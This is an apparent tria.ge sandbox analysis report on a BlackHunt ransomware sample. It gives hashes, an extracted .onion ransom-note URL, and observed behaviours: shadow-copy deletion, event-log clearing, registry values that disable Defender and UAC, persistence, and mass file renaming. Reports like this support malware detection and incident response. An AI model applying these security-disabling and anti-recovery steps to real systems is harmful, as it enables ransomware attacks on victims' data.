Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
9s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
19/01/2024, 00:56
Static task
static1
Behavioral task
behavioral1
Sample
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Resource
win10v2004-20231222-en
General
-
Target
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
-
Size
707KB
-
MD5
fe824c146fe0974cf6b1b87f30034caf
-
SHA1
8a2d1d2556c080482bab8e5b06d0072a8325ebff
-
SHA256
cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022
-
SHA512
18a2115f9b5ae8a3bf93352d7af652b0685b5ad4a57014b9faee4e29972fce06205a0c3f5732bcea66aa24e50b65f462a6182d1dfb9dce379cbb193a1940d9cc
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1l8Evnh:6uaTmkZJ+naie5OTamgEoKxLWw6h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 10856 fsutil.exe 10464 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection cmd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" cmd.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 9880 wevtutil.exe 10232 wevtutil.exe 5808 wevtutil.exe 11272 wevtutil.exe 9028 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 6616 bcdedit.exe 10436 bcdedit.exe 11664 bcdedit.exe 6020 bcdedit.exe -
Renames multiple (1123) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 13164 wbadmin.exe 13008 wbadmin.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\Y: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\J: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\V: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\N: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\W: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\I: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\S: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\H: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\L: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\X: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\Z: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\Q: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\R: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\T: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\O: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\P: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\A: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\G: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\B: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\U: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\K: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened (read-only) \??\M: cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jdk-1.8\jre\legal\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\fillandsign.svg cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\sendforsignature.svg cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\tools.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\af\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\libpng.md cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\plugins\keystore\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_ellipses_selected-hover.svg cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jre-1.8\lib\images\cursors\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress_spinner2x.gif cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_delete_18.svg cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_email.gif cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\app\dev\libs\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\net.properties cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-72x72-precomposed.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\cldrdata.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\ext\jaccess.jar cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_extensions.pak cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\images\cursors\win32_MoveDrop32x32.gif cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jre-1.8\lib\images\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jre-1.8\bin\dtplugin\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jre-1.8\lib\ext\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\MSBuild\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\dotnet\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\mesa3d.md cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_zh_TW.properties cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\#BlackHunt_ReadMe.hta cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\reflow.api cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons_2x.png cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files\Java\jre-1.8\lib\security\policy\limited\#BlackHunt_Private.key cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\#BlackHunt_ReadMe.txt cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOffNotificationInAcrobat.gif cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\bcel.md cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 232 11964 WerFault.exe 254 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 11284 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 10732 vssadmin.exe 11244 vssadmin.exe 9316 vssadmin.exe 10924 vssadmin.exe 10908 vssadmin.exe 10380 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 12436 taskkill.exe -
Modifies registry class 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5172 PING.EXE -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeRestorePrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeBackupPrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeTakeOwnershipPrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeAuditPrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeSecurityPrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Token: SeIncBasePriorityPrivilege 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1144 wrote to memory of 3036 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 185 PID 1144 wrote to memory of 3036 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 185 PID 1144 wrote to memory of 4300 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 183 PID 1144 wrote to memory of 4300 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 183 PID 1144 wrote to memory of 1460 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 182 PID 1144 wrote to memory of 1460 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 182 PID 1144 wrote to memory of 1128 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 181 PID 1144 wrote to memory of 1128 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 181 PID 1144 wrote to memory of 1176 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 180 PID 1144 wrote to memory of 1176 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 180 PID 1144 wrote to memory of 1692 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 179 PID 1144 wrote to memory of 1692 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 179 PID 1144 wrote to memory of 2628 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 176 PID 1144 wrote to memory of 2628 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 176 PID 1144 wrote to memory of 3660 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 175 PID 1144 wrote to memory of 3660 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 175 PID 1144 wrote to memory of 4368 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 174 PID 1144 wrote to memory of 4368 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 174 PID 4300 wrote to memory of 2220 4300 cmd.exe 173 PID 4300 wrote to memory of 2220 4300 cmd.exe 173 PID 1144 wrote to memory of 740 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 57 PID 1144 wrote to memory of 740 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 57 PID 1128 wrote to memory of 1876 1128 cmd.exe 170 PID 1128 wrote to memory of 1876 1128 cmd.exe 170 PID 1144 wrote to memory of 3872 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 168 PID 1144 wrote to memory of 3872 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 168 PID 1144 wrote to memory of 1612 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 58 PID 1144 wrote to memory of 1612 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 58 PID 1144 wrote to memory of 2184 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 166 PID 1144 wrote to memory of 2184 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 166 PID 1144 wrote to memory of 1836 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 164 PID 1144 wrote to memory of 1836 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 164 PID 1144 wrote to memory of 3188 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 163 PID 1144 wrote to memory of 3188 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 163 PID 1144 wrote to memory of 2352 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 162 PID 1144 wrote to memory of 2352 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 162 PID 3036 wrote to memory of 4740 3036 cmd.exe 62 PID 3036 wrote to memory of 4740 3036 cmd.exe 62 PID 1144 wrote to memory of 4720 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 160 PID 1144 wrote to memory of 4720 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 160 PID 1144 wrote to memory of 3528 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 64 PID 1144 wrote to memory of 3528 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 64 PID 1460 wrote to memory of 3904 1460 cmd.exe 157 PID 1460 wrote to memory of 3904 1460 cmd.exe 157 PID 1144 wrote to memory of 60 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 156 PID 1144 wrote to memory of 60 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 156 PID 1144 wrote to memory of 2724 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 154 PID 1144 wrote to memory of 2724 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 154 PID 1144 wrote to memory of 5084 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 65 PID 1144 wrote to memory of 5084 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 65 PID 1144 wrote to memory of 2748 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 151 PID 1144 wrote to memory of 2748 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 151 PID 1144 wrote to memory of 4812 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 149 PID 1144 wrote to memory of 4812 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 149 PID 1144 wrote to memory of 5112 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 147 PID 1144 wrote to memory of 5112 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 147 PID 1144 wrote to memory of 3364 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 145 PID 1144 wrote to memory of 3364 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 145 PID 1144 wrote to memory of 5044 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 143 PID 1144 wrote to memory of 5044 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 143 PID 1176 wrote to memory of 3232 1176 cmd.exe 144 PID 1176 wrote to memory of 3232 1176 cmd.exe 144 PID 1144 wrote to memory of 4700 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 142 PID 1144 wrote to memory of 4700 1144 cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe 142 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
